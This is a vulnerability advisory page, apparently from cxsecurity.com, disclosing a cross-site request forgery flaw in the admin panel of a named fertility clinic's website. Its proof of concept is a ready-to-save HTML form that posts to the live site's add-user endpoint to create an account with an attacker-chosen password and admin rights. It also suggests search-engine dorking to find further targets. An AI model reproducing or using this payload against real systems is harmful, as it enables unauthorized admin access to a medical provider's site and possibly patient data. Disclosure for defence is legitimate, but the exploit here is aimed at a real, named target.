Advanced Fertility & Genetics Centre LLC. by Nanobird Technologies CSRF Vulnerability

2018.07.06
dz indoushka (DZ) dz
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

==================================================================================================================================== | # Title : Advanced Fertility & Genetics Centre LLC. by Nanobird Technologies CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) | | # Vendor : https://nanobirdtech.com/ | | # Dork : | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] save in poc.html <h1>Add User</h1> <ol class="breadcrumb"> <li class="active">Add User</li> </ol> </section> <!-- Main content --> <section class="content"> <div class="row"> <div class="col-md-6"> <div class="box box-primary"> <div class="box-header"> <h3 class="box-title">Enter User Informations</h3> </div><!-- /.box-header --> <div class="box-body"> <form role="form" action="http://www.omanadvancedfertility.com/admin/add-user.php" method="post" enctype="multipart/form-data"> <!-- text input --> <div class="form-group"> <label>Username</label> <input class="form-control" value="" name="username" maxlength="20" required="" type="text"> </div> <div class="form-group"> <label for="exampleInputPassword1">Password</label> <input class="form-control" name="password" id="exampleInputPassword1" value="" required="" maxlength="20" type="password"> </div> <div class="form-group"> <label>User Type</label> <select class="form-control" name="user_type"> <option value="staff">Staff</option> <option value="admin">Admin</option> </select> </div> <div class="box-footer"> <button type="submit" class="btn btn-primary" name="Create"><span class="fa fa-save"></span>&nbsp;Save</button> </div> </form> </div> </div> </div><!-- /.col --> </div> </section><!-- /.content --> </aside> Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | | =======================================================================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top